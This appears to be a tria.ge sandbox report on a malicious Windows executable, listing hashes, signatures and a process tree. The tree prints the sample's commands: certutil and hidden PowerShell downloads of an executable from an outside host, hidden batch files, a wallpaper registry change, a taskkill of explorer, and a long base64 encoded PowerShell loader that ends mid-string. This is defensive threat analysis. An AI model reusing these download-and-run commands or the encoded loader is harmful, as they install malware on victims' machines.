Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    91s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/10/2022, 11:03

General

  • Target

    4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe

  • Size

    1.3MB

  • MD5

    1413f3a72c00016297bc8744b5810673

  • SHA1

    2e94c7d72488dec9a4e69eb8939129ec1ab8857a

  • SHA256

    4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44

  • SHA512

    d21f1f893575039c33614c79725ccd5d1afbb9fd4eb7a2267280188b8cf426f3ed65b3d92688965cda422cf382e632c40d941109fa1da33b49b4e1e0400c3391

  • SSDEEP

    24576:pC4ob9SyKiqD3UIGTMoJamOGRnC9CuQ5O3h3WMtbY:wWiqwI8h3MtbY

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://art-cure.com/upload/ls-sky.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe
    "C:\Users\Admin\AppData\Local\Temp\4c49d75b4a0e0556742d45a1d3bade40f0e43bce7f9b2f1449845a27819e1b44.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h windata.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h windata.bat
        3⤵
        • Views/modifies file attributes
        PID:4060
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start windata.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K windata.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4660
        • C:\Windows\SysWOW64\certutil.exe
          certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
          4⤵
            PID:3184
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h win32.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4452
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h win32.bat
          3⤵
          • Views/modifies file attributes
          PID:2308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start win32.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K win32.bat
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
            4⤵
            • Sets desktop wallpaper using registry
            PID:1484
          • C:\Windows\SysWOW64\rundll32.exe
            RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
            4⤵
              PID:3404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c attrib +h winlog.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h winlog.bat
            3⤵
            • Views/modifies file attributes
            PID:4588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start winlog.bat
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4828
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K winlog.bat
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile( 'http://art-cure.com/upload/ls-sky.exe','update.exe')
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c taskkill /IM explorer.exe /F
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3472
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /IM explorer.exe /F
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAbgBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1012
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAb